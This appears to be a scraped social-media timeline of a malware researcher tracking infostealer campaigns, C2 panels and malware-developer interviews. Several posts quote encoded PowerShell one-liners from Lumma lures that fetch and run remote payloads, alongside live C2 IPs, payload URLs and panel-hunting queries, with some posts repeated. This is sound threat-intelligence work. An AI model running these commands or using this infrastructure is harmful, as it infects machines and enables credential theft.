qui fa lo que pot no esta obligat a mes | donate ๐ธ to g0njxa.eth ๐ | Bad student, enthusiast, defo not an expert
DMs are open, feel free to reach!
๐ผโ๏ธ๐ฃ
In the past weeks I interviewed the staff from the major infostealers projects, a total of 7: Lumma,Raccoon,Meduza,Vidar,Amadey,StealC,Meta.
Below you will find a short summary of this series that ends today, and also the ones who refused to talk.
๐๐
Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues
Vidar talks about the usage of "a TPM module for encryption"
Vidar, Lumma and StealC are already working on this issue to fix it
I mean... Dont let your archive be exposed to the public. ๐ ๐
#opendir
http://77.91.68.78/lend/
Redline, Lumma, Warzone RAT, Meduza Stealer, Povertystealer, Formbook, Raccoon, AsyncRAT, Rhadamanthys, Smoke Loader, WhiteSnake &
a miner on hashvault
#Remcos
RAT being delivered as a fake Crowdstrike Hotfix, targeting
@bbva
bank
from: /portalintranetgrupobbva.com
Delivered via Dropbox
C2: 213.5.130.58:443
Detonation:
Sligthly changes on this
#Lumma
campaign, new frontend and payload design:
powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==
Watch for malicious traffic on shady websites, dont paste nothing on your PC ๐
#Lumma
Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==
Detonation:
Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues
Vidar talks about the usage of "a TPM module for encryption"
Vidar, Lumma and StealC are already working on this issue to fix it
The
#Meduza
stealer has been banned from XSS forum after being accused to infect Russian individuals and failiing to provide protection to these users from being infected by the stealer. ๐ท๐บ
Same issues than Rhadamanthys few weeks ago.
#Meduza
Stealer is not dead!
Search for C2 panels on
@fofabot
:
icon_hash="-559608920"
Some New panels:
193.233.133.81
146.70.161.13
77.105.147.136
185.106.94.31
212.113.116.56
89.185.85.132
95.181.173.235
95.181.173.8
95.181.173.233
89.185.85.34
๐๐
#Raccoon
Stealer has been observed using a new User-Agent: GunnaWunnaBlueTips, since at least 05-13
hxxps://telegra.ph/WareHacks-Soft-04-22
C2 โ๏ธ
#RacconV2
#Recordbreaker
37.220.87.66
45.9.74.99
UA: GunnaWunnaBlueTips
@crep1x
๐
๐๐
Watch for malicious traffic on shady websites, dont paste nothing on your PC ๐
#Lumma
Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==
Detonation:
reCAPTCHA malware campaign is now abusing
@Vultr
S3 buckets and CDN to deliver
#Lumma
Stealer
Detonation:
Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User Agent:
Sligthly changes on this
#Lumma
campaign, new frontend and payload design:
powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==
FYI, an actual updated
#Lumma
Stealer panel
/oldlumma.fun/login
@ViriBack
also the actual Lumma API domain
/funlumma.fun
(Updated at August, 17th from /apilumma1.fun)
Quick changes on this reCAPTCHA malware campaign now abusing
@digitalocean
S3 buckets and CDN to still deliver
#Lumma
Stealer.
Similar behavior,
Detonation:
reCAPTCHA malware campaign is now abusing
@Vultr
S3 buckets and CDN to deliver
#Lumma
Stealer
Detonation:
Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User Agent:
#Lumar
stealer (not Lumma!) and also known and tracked as
#PovertyStealer
() is one of the next infostealers to implement a bypass to the new Google Chrome v128 cookies encryption.
With some disadvantage: build needs administrator rigths
Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues
Vidar talks about the usage of "a TPM module for encryption"
Vidar, Lumma and StealC are already working on this issue to fix it
Lets follow with more Mac OS malware ๐พ๐
A brief interview with Ping3r aka Atomic Mac OS Stealer (AMOS). The infamous original, the alleged first one.
Exclusive content on
#defcon32
days, because why not.
Take a break, take a read! ๐๐
Anonfiles, one of the major free file storage providers that existed in the past years, has announced the end of its service and domain is now for sale
@vxunderground
RIP anonfiles :(
#MeduzaStealer
is pushing out the bypass method in the test version to get cookies from Chrome 127. The pricing is still the same.
Translation:
๐๐ฅ Some stealer users encountered Chrome update 127, which changed the encryption for cookies by executing the process in a separate
The infamous
#Vidar
Stealer also announced today an update to featuring his own bypass to the newest Google Chrome app-bound cookie encryption (without admin privileges)
This announcement is followed after infostealers Meduza, Lumma and Lumar
Full statement ๐๐
Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues
Vidar talks about the usage of "a TPM module for encryption"
Vidar, Lumma and StealC are already working on this issue to fix it
The infamous
#Rhadamanthys
Stealer has been banned from XSS forum after failing to provide protection to CIS countries people.
Rhadamanthys was used against Russian military infrastructure (), also by some fellow traffers guys...
๐ซ๐ซก
#WhiteSnake
Stealer has recently announced an update featuring the creation of malicious .SLN (Visual Studio Solution files) as downloaders from a remote host in order to serve malware
Full changelog statement below: ๐๐
The infamous
#META
Stealer becomes the next infostealer to claim the collection of cookies from the most updated versions of Google Chrome browser (v129)
After Lumma, Lumar, Meduza, Vidar, StealC, Rhadamanthys, WhiteSnake... Who is missing?๐
Full statement ๐๐๐
I recently made an interview with
#Lumma
Stealer staff.
Just a brief talk :)
They want to say Hello, to all of us. The malware project is near to the 1st Anniversary, it's time to dive into Lumma ๐๏ธ
Read it at:
I made a little interview with
#Meduza
Stealer staff.
The "Immaculate" stealer and heir to Aurora's (RIP) legacy shared a little time talking about his product.
Take a look at:
You can also track the latest
#Qakbot
c2 servers with
@fofabot
jarm="21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21" && header_hash="480868286"
๐๐๐๐
You still may have some curiosity about how MacOS infostealers were born and the history behind this kind of malware.
After long months they exist there still was some histories to tell, so caution with your own judgements!
Feel free to take a read ๐๐:
The new exfiltration method used by
#Lumma
Stealer would be POST requests to a new endpoint at C2 servers
Lets say goodbye to /c2sock & /c2conf (RIP ๐๐ผ๐๐ผ)
New endpoint: /api
act=recive_message (Configuration request)
act=send_message (Exfiltration)
@AnFam17
@evstykas
#Lumma
Stealer has just been updated
Featuring the partnership with "GhostSocks", a SOCKS5 manager.
So it seems like Lumma Stealer will now be leveraging Socks5 proxies from victims.
I don't know how this works but I believe something like other proxy malware (
#SystemBC
)
Hunting for
#ClearFake
/
#ClickFix
with
@fofabot
Malicious script seen in the wild leveraging the "Etherhiding" technique using ETH address
()
we can search for domains infected by this campaign using this addresses
Hunt query:
Proofpoint threat researchers have noticed that a clever
#socialengineering
tactic is becoming increasingly popular amongst threat actors.
The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware.
#Lumma
Stealer has now opened a "Log Market" where Lumma operators (with an storefront code) can sell its own logs directly from their panel.
Purchase is made through crypto deposits in BTC or ETH addresses. Currently there's ~5700 logs at sale from unkown vendors
Threat actors are abusing
@teamguilded
CDN to deliver
#AsyncRAT
via malicious Visual Studio Code projects on compromised GitHub accounts disguised as fake game cheats and fake Discord infostealers
cc /
@SquiblydooBlog
@Cipher0091
Detonation:
Thread ๐
Operators behind this
#lumma
campaign also dropped a XMR miner
Detonation:
After reporting to the pool, the worker was disconnected, with an amazing reward (no paid) generated of 0.00079836 XMR ($0.14) between 09/18 21:00 and 09/19 13:00 UTC
profit ๐๐ธ
Crazy Thursday.
- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr.
#Lumma
Stealer implemented a bot protection system, "pre-trained on screenshots of known virtual machines" 2 months ago.
They now claim to have detected 483k bots avoiding 68k "garbage logs", reducing usage of HDDs and helping the world to become cleaner with less CO2 emissions
CryptoGrab, a crypto drainer service was granted with a stand in MAC Yerevan 2024, where "staff and top members" met with the people on the conference, sharing merch and some drinks ๐ญ
First spotted by
@0xneosec
All photos:
I made an interview with
#StealC
stealer owner,
We talked about his malware project, and he "wishes us good luck" in our hunting.
Please read it at:๐๐
Seems like now
#infostealers
found a way to collect valuable information from Mozilla-based browsers extensions.
This are new features on some known Stealers, firstly reported by
#Lumma
Stealer at mid April and followed, for example, by
#ACR
Stealer and
#Vidar
at the moment
๐
I made an interview with
#Vidar
staff,
The infamous Vidar stealer (at its 5th Anniversary) and I had a little talk about his malware project.
They say that "there is no need to hold a grudge against us"...
Read it at: ๐๐
Google Chrome browser v129 was released at September 17th, 2024, and one of the "new" features that took infostealers devs attention is the storage of CVC codes from credit cards
#WhiteSnake
updated recently featuring the grab of this information from browser victims.
I made an interview with
#Recordbreaker
Stealer staff.
Not many questions, just asking things about Raccoon Stealer.
Will "MrBidenNeverKnow" be the next User Agent that we will find on this stealer?
Take a look at: ๐ฆ๐ฆ๐ฆ๐ฆ
If you didn't noticed, some websites involved with
#ClearFake
#FakeUpdates
campaigns seems to be sending download records to a Telegram Bot, forwarded to a Group.
46.255.201.42 - CN authenticprod[.]fr
styktraffred - Group Name
applemalicalo_bot - Bot user
#PrivateLoader
now serves its builds from an FTP server.
1 - download a .zip from a compromised host (/institutodeseguros.com.pe)
2 - Zip contains a .lnk that retrieves the privateloader build .zip from FTP server 147.45.47.80
Stage 3 - Autoit loader
Just been across a weird
#malware
campaign being spread on X via malicious ads (help!)
TL showed me this ad /Andristo_88/status/1776305295263756467 which is aiming to /audacityteam.top (suspended) .
Find it at archive
showing the website and
+๐
Privateloader Rewind 2023 โณ
+1 million unique installs in 2023๐ฏ
A humble blog about the InstallsKey PPI service. Profiling customers, the sources of their installations and the service itself!
Also available at /t.me/privateloader (๐บ๐ฒ&๐ท๐บ)
๐๐ป๐๐ป
While
#lockbit
disruption is getting deservedly all the attention,
Seems like other ransomware gangs are getting issues, talking about
#Stormous
ransomware
๐ Stormous
#DOWN
CHAOS is an open-source RAT (/github.com/tiagorlampert/CHAOS) that was somewhat popular and abused last year, and it's still in use!
Track this on
@fofabot
๐๐
fid="9BUak7FRNMoqKoJPH7v8Lw=="
US, Canada, UK and Australia websites are compromised to serve Fortnite Spam (again)
At first, TA seems to be abusing Kentico CMS Media libraries.
Compromised websites includes Bing Blogs, Credit Unions, Medical Institutions and NGO's
See full list!
hxxp://77.91.78.118/test2.bat
Cute privilege scalation method dropped by
#Amadey
Loader
It also disables any restore point from the infected host and block downloads from browsers.
Ironhost IO - BulletProof Servers
joined the PrivateLoader campaign serving as a c2 since 1st November.
91.92.243.151 - ironhost[.]io
Need a fast and reliable bulletproof server? Do not wait!
just released Safebrowsing โ a new service that lets you quickly explore URLs in an isolated virtual browser ๐ฅ
๐ก๏ธ It notifies you about threats and has a friendly interface, perfect for users with any expertise level
Give it a try, it's free ๐
A new one, still delivering
#Lumma
Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA=
Detonation:
Watch for malicious traffic on shady websites, dont paste nothing on your PC ๐
#Lumma
Stealer
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==
Detonation:
Have you ever wondered what is going on with Vietnamese ๐ป๐ณ malware targeting Facebook accounts?
I did, so you can get a quick overview of these threat actors activities and how they are spending (and earning) millions of $$$
Read now! ๐๐
#dropshipping
Today, my PC was nearly compromised.
With just one click, I installed a malicious
@code
extension. Luckily, I was saved as my PC doesn't run on Windows.
Hackers are getting smarter and aren't just targeting beginners. Here's how they do it and how you can protect your coins!
Android Botnets ain't dead! ๐ฒ
#Ermac
V3.0 Botnet C2 Panel
91.215.85.213
Didn't find any information on this new version of this botnet. Previous V2 had some leak on March 2023
This was a previous C2 for StealC
@0x6rss
want to take a look? :)
A few days ago,
#Amadey
owner and I did a brief interview.
We talk about past, present and future of the infamous
#Amadey
Loader, one of the biggest products in the MaaS environment. Something worth a read.
Please find it at:
#Lumma
Stealer updated its capabilities recently.
It now has the ability to load other files while executing main stealer and self deletion after that
This behavior is common on other stealers like
#Vidar
or
#recordbreaker
, loading crypto clippers like
#laplas
.
Very active.
InCrease, developer of
#Amadey
loader, has decided to share with me some exclusive footage of the upcoming v5 Amadey panel with the new "features, stats and FAQ".
These are currently available to few Amadey beta-testers, release is scheduled to 6th anniversary on October 2024.
Let's discover one of the "youngest" infostealers traffers teams playing bad around...
Ghostbusters aka MMM Team ๐ป
+70k victims recorded in less than a year with +100 members disclosed, still active ๐
Absolute customization of builds and more!!
๐ช๐
An unkown
#stealer
has been spotted on YT!
C2 โ๏ธ
http://146.71.81.144/
Cookie Stealer, File Grabber, Crypto wallets, Password managers and Screenshoots, everything POST to C2
Take a look!๐๐ Just uploaded to VT
#StealC
stealer has recently released an update (v1.9.2) featuring an "offline" version (without requests to C2, log is stored on the victim) and also a dll version allegedly copied from
#Vidar
Stealer
This features allows StealC to be used as an enumeration / discovery tool
@LinkedIn
accounts are compromised in a daily basis to join a big SEO poisoning campaign via LinkedIn Pulses.
Users are then redirected to fake malicious sites where malware is being distributed, mainly
#Lumma
Stealer,
#Cryptbot
and
#AMOS
for Mac Users (finally found! ๐)
๐๐
More live
#Clearfake
!
This is not about RU, this is China! ๐จ๐ณ๐จ๐ณ
Search on
@fofabot
title="Google Chrome ็ฝ็ปๆต่งๅจ"
Examples:
/www.updateload.live/
/ggsdown.top
/update.chrome-up.com/
/y13xlt1d.xyz/
/url.drvceo.com
/kcdq78.fit
Check samples!
The infamous
#Vidar
Stealer also announced today an update to featuring his own bypass to the newest Google Chrome app-bound cookie encryption (without admin privileges)
This announcement is followed after infostealers Meduza, Lumma and Lumar
Full statement ๐๐
#Meta
Stealer just got updated to v4.3
So it seems like malware developers are now using AI to sign builds in order to avoid detections?
@NexusFuzzy
I believe the same updates will be seen on Redline soon, as usual.
Check everything ๐๐ป๐
Watch out Dynamics 365 *.microsoftcrmportals domains, abused at the "free vbucks" SEO poisoning campaign ๐
/osvolunteers.microsoftcrmportals.com
/fms.microsoftcrmportals.com
/indspire.microsoftcrmportals.com
/ecosoft.microsoftcrmportals.com
/bggtscsp.microsoftcrmportals.com
hxxp://bratzen.duckdns.org/byte/
#Opendir
Unknown
#loader
Hosting unkown payloads as a Comercial Loader for malware distribution.
Stored as .txt with the client TG username.
Seen on
#PrivateLoader
campaigns
The infamous Raccoon stealer ๐ฆ has not been updated for long months and the activity in the wild has dropped (Talking about me I see no more Raccoon)
Asked his staff, seems like the old coder left and there's a new one working on, so we must expect new updates soon!
๐โ๏ธ
Mac OS malware ๐๐พhas been a trend in the past months... They are a threat that can be found in the wild pretty easily
So why not to release some interviews with Mac OS infostealers?
Today, a brief talk with Poseidon Stealer dev aka Rodrigo ๐๐
Hunting
#Clearfake
with
@fofabot
fid="QddxtK34KUI1XP5ujfy5bw=="
Track the latest compromised domains
/altenara.com
/doolittles.be
/easymall.co.th
/megacarwreckers.com.au
/filmovita.ba
/staging.armipour.com
/or-and.com
/esmito.com
/sistemajogodobicho.com
There should be more!
#Rhadamanthys
kept their words and released new versions (v0.7) maintaining the malware project alive
New API interface, frameworks rewritten and usage of AI for (mnemonic) phrases extraction?
Full statement below! ๐
The
#Rhadamanthys
Stealer project is not dead (after being banned from XSS and Exploit forums)
His owner is now featuring a "new beginning", with future releases of new versions.
Something crazy is now being pushed by
#Privateloader
opens a pop-up window with a Microsoft error and a QR Code.
/pcrrent.com (Microsoft phishing) ๐จ๐ณ??
Financial information is asked and exfiltrated via POST to /pcrrent.com/index.php
Full Detonation:
Somebody found a tg bot api hash from snake keylogger (like me) and decided to share free malware on all chats
A stealer with no detections, what is it?
c2:
http://128.199.113.162/XtfcshEgt/upwawsfrg.php
panel: 128.199.113.162
@ViriBack
Detonation:
#META
stealer v5.0 is actually released after the previous announcement.
Featuring TLS encryption between build and C2 panel (as seen in other stealers like Lumma or Vidar in recent updates), among other new and fancy features.
Check everything ๐
#META
stealer announced recently an incoming update on June 17th featuring a "new, unique and individual system"
Current version is v4.6 from May 23th
Let's see what they prepare... ๐
The use of SSL certificates on
#stealers
commn. to C2 servers is becoming popular among this malware projects.
Exfiltration over HTTPS allegedly makes them to "receive less detections on c2s and prolong its life"
A recent example is
#Lumma
Stealer ๐๐
CrowdStrike outage is fake, there is no incident!!!!
We hacked into company using Crowdstrike and everything was good, stop spreading disinformation in the media you liars!!!!
๐